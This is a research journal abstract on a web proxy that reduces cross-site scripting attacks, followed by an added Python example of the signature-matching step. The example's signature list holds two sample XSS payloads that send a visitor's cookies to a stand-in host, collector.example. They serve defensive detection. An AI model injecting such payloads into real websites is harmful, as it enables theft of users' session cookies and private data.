UIC Research Journal, vol. 17 no. 2 (2011)

Developing a Web Proxy Server Application to Minimize Cross-Site Scripting Attacks

Eric John G. Emberda | Siegfried C. Capon | Johanah A. Maunda

Discipline: Information Technology

 

Abstract:

Stealing information from a user’s computer through the Internet is a growing concern. One type of Internet attack, or cybercrime, is Cross-Site Scripting (XSS). It allows an attacker to retrieve information from an Internet user by inserting a script into a vulnerable website, where it automatically mines private data from the victim and then sends that data to another website. This study was conducted to examine the different vulnerable aspects of a website. A list of XSS-vulnerable websites was gathered, as well as a list of different XSS scripts. These websites were tested with the XSS scripts to determine the entry point through which the scripts can penetrate. A web proxy application was created that implements different mechanisms to prevent these XSS scripts from successfully mining private data. The web proxy application was able to minimize XSS attacks by comparing the scripts inside the website with the database of XSS scripts. The researchers, however, recommend that the process of preventing XSS scripts be improved by adding artificially intelligent algorithms that will read patterns for XSS scripts and distinguish them from safe scripts.
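
The comparison step described in the abstract, shown as an added Python example; this is not the authors' code, which the abstract does not include. The signature list, the `collector.example` host, the whitespace/case normalization and the 403 block page are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

# Constructed sample signatures; the study's actual database is not shown on the page.
XSS_DB = [
    "new Image().src='http://collector.example/c?'+document.cookie",
    "document.location='http://collector.example/c?'+document.cookie",
]

def normalize(script):
    """Drop whitespace and case so re-spaced or re-cased copies still match."""
    return re.sub(r"\s+", "", script).lower()

KNOWN = {normalize(s) for s in XSS_DB}

class ScriptCollector(HTMLParser):
    """Collects inline <script> bodies and on* event-handler attribute values."""
    def __init__(self):
        super().__init__()
        self.scripts, self._buf = [], None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._buf = []  # start buffering the script body
        self.scripts += [v for k, v in attrs if k.startswith("on") and v]

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)  # script text may arrive in several chunks

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append("".join(self._buf))
            self._buf = None

def find_known_xss(html):
    """Return the scripts in an HTML body that match the database after normalization."""
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()
    return [s for s in collector.scripts if normalize(s) in KNOWN]

def filter_response(status, body):
    """Proxy decision: pass the upstream response through, or replace it with a block page."""
    if find_known_xss(body):
        return 403, "<h1>Blocked by proxy: known XSS script</h1>"
    return status, body
```

Exact matching only recognises scripts that are already in the database, which is the limitation behind the authors' recommendation to add pattern-reading algorithms.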